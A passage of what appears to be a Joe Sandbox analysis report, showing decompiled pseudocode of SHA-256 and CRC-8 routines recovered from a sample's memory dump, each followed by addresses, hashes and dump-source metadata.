				_t146 = _t145 << 8;
				_t120 = (_t119 << 0x00000020 | _t146) << 8;
				_t193[_t227 + 0x2a] = _t118 >> 0x18;
				_t147 = _t146 << 8;
				_t121 = (_t120 << 0x00000020 | _t147) << 8;
				_t193[_t227 + 0x2b] = _t119 >> 0x18;
				_t148 = _t147 << 8;
				_t122 = (_t121 << 0x00000020 | _t148) << 8;
				_t193[_t227 + 0x2c] = _t120 >> 0x18;
				_t193[_t227 + 0x2d] = _t121 >> 0x18;
				 *(_t229 + 0xc) = _t148 << 8;
				_t193[_t227 + 0x2e] = _t122 >> 0x18;
				_t193[_t227 + 0x2f] = _t122 >> 0x10;
				E00C873F0(_t193);
				 *_t194 = _t193[3] & 0x000000ff;
				 *((char*)(_t194 + 1)) = _t193[2] & 0x000000ff;
				_t197 = _t194 + 3;
				 *((char*)(_t197 - 1)) =  *_t193 >> 8;
				 *_t197 =  *_t193 & 0x000000ff;
				 *((char*)(_t197 + 1)) = _t193[7] & 0x000000ff;
				_t198 = _t197 + 1;
				 *((char*)(_t198 + 1)) = _t193[6] & 0x000000ff;
				_t200 = _t198 + 2;
				 *_t200 = _t193[4] >> 8;
				 *((char*)(_t200 + 1)) = _t193[4] & 0x000000ff;
				_t201 = _t200 + 1;
				 *((char*)(_t201 + 1)) = _t193[0xb] & 0x000000ff;
				_t202 = _t201 + 1;
				 *((char*)(_t202 + 1)) = _t193[0xa] & 0x000000ff;
				_t204 = _t202 + 2;
				 *_t204 = _t193[8] >> 8;
				_t205 = _t204 + 1;
				 *_t205 = _t193[8] & 0x000000ff;
				_t206 = _t205 + 1;
				 *_t206 = _t193[0xf] & 0x000000ff;
				_t207 = _t206 + 1;
				 *_t207 = _t193[0xe] & 0x000000ff;
				_t209 = _t207 + 2;
				 *((char*)(_t209 - 1)) = _t193[0xc] >> 8;
				 *_t209 = _t193[0xc] & 0x000000ff;
				 *((char*)(_t209 + 1)) = _t193[0x13] & 0x000000ff;
				_t210 = _t209 + 1;
				 *((char*)(_t210 + 1)) = _t193[0x12] & 0x000000ff;
				_t213 = _t210 + 3;
				 *((char*)(_t213 - 1)) = _t193[0x10] >> 8;
				 *_t213 = _t193[0x10] & 0x000000ff;
				 *((char*)(_t213 + 1)) = _t193[0x17] & 0x000000ff;
				_t214 = _t213 + 1;
				 *((char*)(_t214 + 1)) = _t193[0x16] & 0x000000ff;
				_t216 = _t214 + 2;
				 *_t216 = _t193[0x14] >> 8;
				 *((char*)(_t216 + 1)) = _t193[0x14] & 0x000000ff;
				_t217 = _t216 + 1;
				 *((char*)(_t217 + 1)) = _t193[0x1b] & 0x000000ff;
				_t218 = _t217 + 1;
				 *((char*)(_t218 + 1)) = _t193[0x1a] & 0x000000ff;
				_t220 = _t218 + 2;
				 *_t220 = _t193[0x18] >> 8;
				 *((char*)(_t220 + 1)) = _t193[0x18] & 0x000000ff;
				_t221 = _t220 + 1;
				 *((char*)(_t221 + 1)) = _t193[0x1f] & 0x000000ff;
				_t222 = _t221 + 1;
				 *((char*)(_t222 + 1)) = _t193[0x1e] & 0x000000ff;
				_t224 = _t222 + 2;
				 *_t224 = _t193[0x1c] >> 8;
				 *((char*)(_t224 + 1)) = _t193[0x1c] & 0x000000ff;
				 *_t193 = 0x6a09e667;
				_t193[4] = 0xbb67ae85;
				_t193[8] = 0x3c6ef372;
				_t193[0xc] = 0xa54ff53a;
				_t193[0x10] = 0x510e527f;
				_t193[0x14] = 0x9b05688c;
				_t193[0x18] = 0x1f83d9ab;
				_t193[0x1c] = 0x5be0cd19;
				_t193[0x20] = 0;
				_t193[0x24] = 0;
				return 0;
			}











































                                                                                                                                                                                          0x00c874f0
                                                                                                                                                                                          0x00c874f4
                                                                                                                                                                                          0x00c874fc
                                                                                                                                                                                          0x00c87501
                                                                                                                                                                                          0x00c87507
                                                                                                                                                                                          0x00c8750c
                                                                                                                                                                                          0x00c87511
                                                                                                                                                                                          0x00c87512
                                                                                                                                                                                          0x00c87514
                                                                                                                                                                                          0x00c8751b
                                                                                                                                                                                          0x00c8751d
                                                                                                                                                                                          0x00c87520
                                                                                                                                                                                          0x00c87524
                                                                                                                                                                                          0x00c87529
                                                                                                                                                                                          0x00c87529
                                                                                                                                                                                          0x00c8752d
                                                                                                                                                                                          0x00c87532
                                                                                                                                                                                          0x00c87533
                                                                                                                                                                                          0x00c8753a
                                                                                                                                                                                          0x00c87540
                                                                                                                                                                                          0x00c87543
                                                                                                                                                                                          0x00c8754a
                                                                                                                                                                                          0x00c87550
                                                                                                                                                                                          0x00c87553
                                                                                                                                                                                          0x00c8755a
                                                                                                                                                                                          0x00c87560
                                                                                                                                                                                          0x00c87563
                                                                                                                                                                                          0x00c8756a
                                                                                                                                                                                          0x00c87570
                                                                                                                                                                                          0x00c87573
                                                                                                                                                                                          0x00c8757a
                                                                                                                                                                                          0x00c87580
                                                                                                                                                                                          0x00c87583
                                                                                                                                                                                          0x00c8758a
                                                                                                                                                                                          0x00c87593
                                                                                                                                                                                          0x00c875a2
                                                                                                                                                                                          0x00c875a6
                                                                                                                                                                                          0x00c875aa
                                                                                                                                                                                          0x00c875ae
                                                                                                                                                                                          0x00c875b7
                                                                                                                                                                                          0x00c875bd
                                                                                                                                                                                          0x00c875c4
                                                                                                                                                                                          0x00c875c8
                                                                                                                                                                                          0x00c875ce
                                                                                                                                                                                          0x00c875d4
                                                                                                                                                                                          0x00c875db
                                                                                                                                                                                          0x00c875dc
                                                                                                                                                                                          0x00c875e3
                                                                                                                                                                                          0x00c875e7
                                                                                                                                                                                          0x00c875ed
                                                                                                                                                                                          0x00c875f4
                                                                                                                                                                                          0x00c875f5
                                                                                                                                                                                          0x00c875fc
                                                                                                                                                                                          0x00c875fd
                                                                                                                                                                                          0x00c87604
                                                                                                                                                                                          0x00c87608
                                                                                                                                                                                          0x00c8760e
                                                                                                                                                                                          0x00c8760f
                                                                                                                                                                                          0x00c87615
                                                                                                                                                                                          0x00c87616
                                                                                                                                                                                          0x00c8761c
                                                                                                                                                                                          0x00c8761d
                                                                                                                                                                                          0x00c87623
                                                                                                                                                                                          0x00c87627
                                                                                                                                                                                          0x00c8762e
                                                                                                                                                                                          0x00c87634
                                                                                                                                                                                          0x00c8763b
                                                                                                                                                                                          0x00c8763c
                                                                                                                                                                                          0x00c87644
                                                                                                                                                                                          0x00c87648
                                                                                                                                                                                          0x00c8764f
                                                                                                                                                                                          0x00c87655
                                                                                                                                                                                          0x00c8765c
                                                                                                                                                                                          0x00c8765d
                                                                                                                                                                                          0x00c87664
                                                                                                                                                                                          0x00c87668
                                                                                                                                                                                          0x00c8766e
                                                                                                                                                                                          0x00c87675
                                                                                                                                                                                          0x00c87676
                                                                                                                                                                                          0x00c8767d
                                                                                                                                                                                          0x00c8767e
                                                                                                                                                                                          0x00c87685
                                                                                                                                                                                          0x00c87689
                                                                                                                                                                                          0x00c8768f
                                                                                                                                                                                          0x00c87696
                                                                                                                                                                                          0x00c87697
                                                                                                                                                                                          0x00c8769e
                                                                                                                                                                                          0x00c8769f
                                                                                                                                                                                          0x00c876a6
                                                                                                                                                                                          0x00c876aa
                                                                                                                                                                                          0x00c876b0
                                                                                                                                                                                          0x00c876b7
                                                                                                                                                                                          0x00c876bd
                                                                                                                                                                                          0x00c876c4
                                                                                                                                                                                          0x00c876cb
                                                                                                                                                                                          0x00c876d2
                                                                                                                                                                                          0x00c876d9
                                                                                                                                                                                          0x00c876e0
                                                                                                                                                                                          0x00c876e7
                                                                                                                                                                                          0x00c876ee
                                                                                                                                                                                          0x00c876f1
                                                                                                                                                                                          0x00c876f8

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5437e10c3ccbbf219971d31049fba2a77a211274c78406d09a9c6ab9f49c5bf4
                                                                                                                                                                                          • Instruction ID: 3aa39424158e52cffadf2b2b5e03568baf57cf09221a57c2d36f570ad11e3012
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5437e10c3ccbbf219971d31049fba2a77a211274c78406d09a9c6ab9f49c5bf4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F071865410DBE29BC316CF3948902A8FFE1AE67201718875DD8F643B86C668E1A5DBF1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C871F0 Relevance: .2, Instructions: 167COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E00C871F0(intOrPtr* _a4, intOrPtr _a8) {
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _v120;
				intOrPtr* _t116;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t144;
				intOrPtr* _t150;
				intOrPtr* _t162;
				intOrPtr _t183;
				intOrPtr* _t190;
				signed int _t191;
				void* _t217;

				_t217 =  &_v120;
				_t116 = _a4;
				_v96 =  *_t116;
				_v92 =  *((intOrPtr*)(_t116 + 4));
				_v88 =  *((intOrPtr*)(_t116 + 8));
				_v84 =  *((intOrPtr*)(_t116 + 0xc));
				_v80 =  *((intOrPtr*)(_t116 + 0x10));
				_v76 =  *((intOrPtr*)(_t116 + 0x14));
				_v72 =  *((intOrPtr*)(_t116 + 0x18));
				_t191 = 0;
				_v68 =  *((intOrPtr*)(_t116 + 0x1c));
				_v116 = 0;
				_v100 = _a8 -  &_v64;
				do {
					_t144 = 1;
					_t162 =  &_v64;
					_v112 = 1;
					_t25 = _t144 - 5; // -4
					_t119 = _t25;
					_v108 = _t162;
					_v120 = 0xd47428 + _t191 * 4;
					_v104 = 0x10;
					do {
						if(_t191 == 0) {
							_t183 =  *((intOrPtr*)(_v100 + _t162));
							 *_t162 = _t183;
						} else {
							_t32 = _t144 - 3; // -2
							_t36 = _t144 - 1; // 0x0
							asm("ror ebx, 0x12");
							asm("ror ebp, 0x7");
							asm("ror esi, 0x13");
							asm("ror ebp, 0x11");
							_t190 = _t217 + 0x48 + (_t36 & 0x0000000f) * 4;
							 *_t190 =  *_t190 + ( *(_t217 + 0x48 + (_t144 & 0x0000000f) * 4) ^  *(_t217 + 0x48 + (_t144 & 0x0000000f) * 4) ^  *(_t217 + 0x48 + (_t144 & 0x0000000f) * 4) >> 0x00000003) + ( *(_t217 + 0x48 + (_t32 & 0x0000000f) * 4) ^  *(_t217 + 0x48 + (_t32 & 0x0000000f) * 4) ^  *(_t217 + 0x48 + (_t32 & 0x0000000f) * 4) >> 0x0000000a) +  *((intOrPtr*)(_t217 + 0x48 + (_t144 + 0xfffffff8 & 0x0000000f) * 4));
							_t183 =  *_t190;
						}
						_t48 = _t119 + 2; // -2
						_t52 = _t119 + 3; // -1
						asm("ror ebx, 0x19");
						asm("ror ebp, 0xb");
						asm("ror ebp, 0x6");
						_t53 = _t119 + 1; // -3
						_t150 = _t217 + 0x28 + (_t52 & 0x00000007) * 4;
						 *_t150 =  *_t150 + ( *(_t217 + 0x28 + (_t119 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t119 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t119 & 0x00000007) * 4)) + (( *(_t217 + 0x28 + (_t53 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t48 & 0x00000007) * 4)) &  *(_t217 + 0x28 + (_t119 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t48 & 0x00000007) * 4)) +  *_v120 + _t183;
						_t61 = _t119 - 1; // -5
						 *((intOrPtr*)(_t217 + 0x28 + (_t61 & 0x00000007) * 4)) =  *((intOrPtr*)(_t217 + 0x28 + (_t61 & 0x00000007) * 4)) +  *_t150;
						_t71 = _t119 - 4; // -8
						_v120 = _v120 + 4;
						_t77 = _t119 - 3; // -7
						asm("ror edi, 0x16");
						asm("ror ebx, 0xd");
						asm("ror ebx, 0x2");
						_t81 = _t119 - 2; // -6
						_t191 = _v116;
						 *_t150 =  *_t150 + ( *(_t217 + 0x28 + (_t71 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t71 & 0x00000007) * 4) ^  *(_t217 + 0x28 + (_t71 & 0x00000007) * 4)) + ( *(_t217 + 0x28 + (_t81 & 0x00000007) * 4) & ( *(_t217 + 0x28 + (_t77 & 0x00000007) * 4) |  *(_t217 + 0x28 + (_t71 & 0x00000007) * 4)) |  *(_t217 + 0x28 + (_t77 & 0x00000007) * 4) &  *(_t217 + 0x28 + (_t71 & 0x00000007) * 4));
						_t144 = _v112 + 1;
						_t162 = _v108 + 4;
						_t119 = _t119 - 1;
						_t88 =  &_v104;
						 *_t88 = _v104 - 1;
						_v112 = _t144;
						_v108 = _t162;
					} while ( *_t88 != 0);
					_t191 = _t191 + 0x10;
					_v116 = _t191;
				} while (_t191 < 0x40);
				_t120 = _a4;
				 *_t120 =  *_t120 + _v96;
				 *((intOrPtr*)(_t120 + 4)) =  *((intOrPtr*)(_t120 + 4)) + _v92;
				 *((intOrPtr*)(_t120 + 8)) =  *((intOrPtr*)(_t120 + 8)) + _v88;
				 *((intOrPtr*)(_t120 + 0xc)) =  *((intOrPtr*)(_t120 + 0xc)) + _v84;
				 *((intOrPtr*)(_t120 + 0x10)) =  *((intOrPtr*)(_t120 + 0x10)) + _v80;
				 *((intOrPtr*)(_t120 + 0x14)) =  *((intOrPtr*)(_t120 + 0x14)) + _v76;
				 *((intOrPtr*)(_t120 + 0x18)) =  *((intOrPtr*)(_t120 + 0x18)) + _v72;
				 *((intOrPtr*)(_t120 + 0x1c)) =  *((intOrPtr*)(_t120 + 0x1c)) + _v68;
				return _t120;
			}




























                                                                                                                                                                                          0x00c871f0
                                                                                                                                                                                          0x00c871f3
                                                                                                                                                                                          0x00c871fc
                                                                                                                                                                                          0x00c87203
                                                                                                                                                                                          0x00c8720a
                                                                                                                                                                                          0x00c87212
                                                                                                                                                                                          0x00c87219
                                                                                                                                                                                          0x00c87221
                                                                                                                                                                                          0x00c87230
                                                                                                                                                                                          0x00c87234
                                                                                                                                                                                          0x00c8723d
                                                                                                                                                                                          0x00c87241
                                                                                                                                                                                          0x00c87245
                                                                                                                                                                                          0x00c87250
                                                                                                                                                                                          0x00c87250
                                                                                                                                                                                          0x00c87255
                                                                                                                                                                                          0x00c87260
                                                                                                                                                                                          0x00c87264
                                                                                                                                                                                          0x00c87264
                                                                                                                                                                                          0x00c87267
                                                                                                                                                                                          0x00c8726b
                                                                                                                                                                                          0x00c8726f
                                                                                                                                                                                          0x00c87277
                                                                                                                                                                                          0x00c87279
                                                                                                                                                                                          0x00c872d0
                                                                                                                                                                                          0x00c872d3
                                                                                                                                                                                          0x00c8727b
                                                                                                                                                                                          0x00c87288
                                                                                                                                                                                          0x00c87292
                                                                                                                                                                                          0x00c87298
                                                                                                                                                                                          0x00c8729b
                                                                                                                                                                                          0x00c872a7
                                                                                                                                                                                          0x00c872ac
                                                                                                                                                                                          0x00c872c2
                                                                                                                                                                                          0x00c872c6
                                                                                                                                                                                          0x00c872c8
                                                                                                                                                                                          0x00c872c8
                                                                                                                                                                                          0x00c872e2
                                                                                                                                                                                          0x00c872ec
                                                                                                                                                                                          0x00c872f2
                                                                                                                                                                                          0x00c872f5
                                                                                                                                                                                          0x00c872fc
                                                                                                                                                                                          0x00c87301
                                                                                                                                                                                          0x00c87319
                                                                                                                                                                                          0x00c8731f
                                                                                                                                                                                          0x00c87323
                                                                                                                                                                                          0x00c87329
                                                                                                                                                                                          0x00c87331
                                                                                                                                                                                          0x00c8733b
                                                                                                                                                                                          0x00c87340
                                                                                                                                                                                          0x00c8734c
                                                                                                                                                                                          0x00c87351
                                                                                                                                                                                          0x00c87358
                                                                                                                                                                                          0x00c8735d
                                                                                                                                                                                          0x00c87375
                                                                                                                                                                                          0x00c8737b
                                                                                                                                                                                          0x00c87381
                                                                                                                                                                                          0x00c87382
                                                                                                                                                                                          0x00c87385
                                                                                                                                                                                          0x00c87386
                                                                                                                                                                                          0x00c87386
                                                                                                                                                                                          0x00c8738b
                                                                                                                                                                                          0x00c8738f
                                                                                                                                                                                          0x00c8738f
                                                                                                                                                                                          0x00c87399
                                                                                                                                                                                          0x00c8739c
                                                                                                                                                                                          0x00c873a0
                                                                                                                                                                                          0x00c873a9
                                                                                                                                                                                          0x00c873b4
                                                                                                                                                                                          0x00c873ba
                                                                                                                                                                                          0x00c873c1
                                                                                                                                                                                          0x00c873c8
                                                                                                                                                                                          0x00c873d3
                                                                                                                                                                                          0x00c873d6
                                                                                                                                                                                          0x00c873e1
                                                                                                                                                                                          0x00c873e4
                                                                                                                                                                                          0x00c873ee

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9376017e230c8c2772cac09a0db696bec2dd001be703a530f11f3bc7e7cb67e5
                                                                                                                                                                                          • Instruction ID: 7e9d7806af3ea2ab4b55a6f478535bb5fef0953053399e9fcd0d6cf3ea252058
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9376017e230c8c2772cac09a0db696bec2dd001be703a530f11f3bc7e7cb67e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: C46179725087118FC318DF49D48494AF3E1FFC8328F1A8A6DEA885B361D771E959CB86
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8FED0 Relevance: .1, Instructions: 59COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8FED0(void* __edi, void* __esi) {
				signed char _t17;
				unsigned char _t19;
				unsigned char _t20;
				unsigned char _t21;
				unsigned char _t22;
				unsigned char _t23;
				unsigned char _t24;
				unsigned char _t25;
				unsigned char _t26;
				signed char _t27;
				void* _t36;
				void* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				_t17 = 0;
				_t36 = 0;
				if(__esi > 0) {
					do {
						_t19 =  *(_t36 + _t37) ^ _t17;
						if((_t19 & 0x00000001) == 0) {
							_t20 = _t19 >> 1;
						} else {
							_t20 = _t19 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t20 & 0x00000001) == 0) {
							_t21 = _t20 >> 1;
						} else {
							_t21 = _t20 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t21 & 0x00000001) == 0) {
							_t22 = _t21 >> 1;
						} else {
							_t22 = _t21 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t22 & 0x00000001) == 0) {
							_t23 = _t22 >> 1;
						} else {
							_t23 = _t22 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t23 & 0x00000001) == 0) {
							_t24 = _t23 >> 1;
						} else {
							_t24 = _t23 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t24 & 0x00000001) == 0) {
							_t25 = _t24 >> 1;
						} else {
							_t25 = _t24 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t25 & 0x00000001) == 0) {
							_t26 = _t25 >> 1;
						} else {
							_t26 = _t25 >> 0x00000001 ^ 0x0000008c;
						}
						if((_t26 & 0x00000001) == 0) {
							_t27 = _t26 >> 1;
						} else {
							_t27 = _t26 >> 0x00000001 ^ 0x0000008c;
						}
						_t36 = _t36 + 1;
						_t17 = _t27;
					} while (_t36 < _t38);
				}
				return _t17;
			}
















                                                                                                                                                                                          0x00c8fed0
                                                                                                                                                                                          0x00c8fed0
                                                                                                                                                                                          0x00c8fed0
                                                                                                                                                                                          0x00c8fed2
                                                                                                                                                                                          0x00c8fed6
                                                                                                                                                                                          0x00c8fed8
                                                                                                                                                                                          0x00c8fedb
                                                                                                                                                                                          0x00c8fee0
                                                                                                                                                                                          0x00c8fee9
                                                                                                                                                                                          0x00c8fee2
                                                                                                                                                                                          0x00c8fee4
                                                                                                                                                                                          0x00c8fee4
                                                                                                                                                                                          0x00c8feee
                                                                                                                                                                                          0x00c8fef7
                                                                                                                                                                                          0x00c8fef0
                                                                                                                                                                                          0x00c8fef2
                                                                                                                                                                                          0x00c8fef2
                                                                                                                                                                                          0x00c8fefc
                                                                                                                                                                                          0x00c8ff05
                                                                                                                                                                                          0x00c8fefe
                                                                                                                                                                                          0x00c8ff00
                                                                                                                                                                                          0x00c8ff00
                                                                                                                                                                                          0x00c8ff0a
                                                                                                                                                                                          0x00c8ff13
                                                                                                                                                                                          0x00c8ff0c
                                                                                                                                                                                          0x00c8ff0e
                                                                                                                                                                                          0x00c8ff0e
                                                                                                                                                                                          0x00c8ff18
                                                                                                                                                                                          0x00c8ff21
                                                                                                                                                                                          0x00c8ff1a
                                                                                                                                                                                          0x00c8ff1c
                                                                                                                                                                                          0x00c8ff1c
                                                                                                                                                                                          0x00c8ff26
                                                                                                                                                                                          0x00c8ff2f
                                                                                                                                                                                          0x00c8ff28
                                                                                                                                                                                          0x00c8ff2a
                                                                                                                                                                                          0x00c8ff2a
                                                                                                                                                                                          0x00c8ff34
                                                                                                                                                                                          0x00c8ff3d
                                                                                                                                                                                          0x00c8ff36
                                                                                                                                                                                          0x00c8ff38
                                                                                                                                                                                          0x00c8ff38
                                                                                                                                                                                          0x00c8ff42
                                                                                                                                                                                          0x00c8ff4b
                                                                                                                                                                                          0x00c8ff44
                                                                                                                                                                                          0x00c8ff46
                                                                                                                                                                                          0x00c8ff46
                                                                                                                                                                                          0x00c8ff4d
                                                                                                                                                                                          0x00c8ff4e
                                                                                                                                                                                          0x00c8ff50
                                                                                                                                                                                          0x00c8fed8
                                                                                                                                                                                          0x00c8ff54

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: fa9271273bdbe4e4e1a7a42b2a790ada785bacc9cc96101a48ac55629196a006
                                                                                                                                                                                          • Instruction ID: e4078db181f5baa897fef4a7121e2f8ed007da512d4c0957fd0bcd6e506ffe06
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa9271273bdbe4e4e1a7a42b2a790ada785bacc9cc96101a48ac55629196a006
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0012922056E1887DE1560AB48303F703C04B0776CCA4937C4BBA423E67BEAA9C7F64C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8FE60 Relevance: .0, Instructions: 50COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8FE60(signed int __eax, signed int _a4) {
				unsigned char _t18;
				unsigned char _t19;
				unsigned char _t20;
				unsigned char _t21;
				unsigned char _t22;
				unsigned char _t23;
				unsigned char _t24;
				unsigned char _t25;

				_t18 = __eax ^ _a4;
				if((_t18 & 0x00000001) == 0) {
					_t19 = _t18 >> 1;
				} else {
					_t19 = _t18 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t19 & 0x00000001) == 0) {
					_t20 = _t19 >> 1;
				} else {
					_t20 = _t19 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t20 & 0x00000001) == 0) {
					_t21 = _t20 >> 1;
				} else {
					_t21 = _t20 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t21 & 0x00000001) == 0) {
					_t22 = _t21 >> 1;
				} else {
					_t22 = _t21 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t22 & 0x00000001) == 0) {
					_t23 = _t22 >> 1;
				} else {
					_t23 = _t22 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t23 & 0x00000001) == 0) {
					_t24 = _t23 >> 1;
				} else {
					_t24 = _t23 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t24 & 0x00000001) == 0) {
					_t25 = _t24 >> 1;
				} else {
					_t25 = _t24 >> 0x00000001 ^ 0x0000008c;
				}
				if((_t25 & 0x00000001) == 0) {
					return _t25 >> 1;
				} else {
					return _t25 >> 0x00000001 ^ 0x0000008c;
				}
			}











                                                                                                                                                                                          0x00c8fe60
                                                                                                                                                                                          0x00c8fe66
                                                                                                                                                                                          0x00c8fe6e
                                                                                                                                                                                          0x00c8fe68
                                                                                                                                                                                          0x00c8fe6a
                                                                                                                                                                                          0x00c8fe6a
                                                                                                                                                                                          0x00c8fe72
                                                                                                                                                                                          0x00c8fe7a
                                                                                                                                                                                          0x00c8fe74
                                                                                                                                                                                          0x00c8fe76
                                                                                                                                                                                          0x00c8fe76
                                                                                                                                                                                          0x00c8fe7e
                                                                                                                                                                                          0x00c8fe86
                                                                                                                                                                                          0x00c8fe80
                                                                                                                                                                                          0x00c8fe82
                                                                                                                                                                                          0x00c8fe82
                                                                                                                                                                                          0x00c8fe8a
                                                                                                                                                                                          0x00c8fe92
                                                                                                                                                                                          0x00c8fe8c
                                                                                                                                                                                          0x00c8fe8e
                                                                                                                                                                                          0x00c8fe8e
                                                                                                                                                                                          0x00c8fe96
                                                                                                                                                                                          0x00c8fe9e
                                                                                                                                                                                          0x00c8fe98
                                                                                                                                                                                          0x00c8fe9a
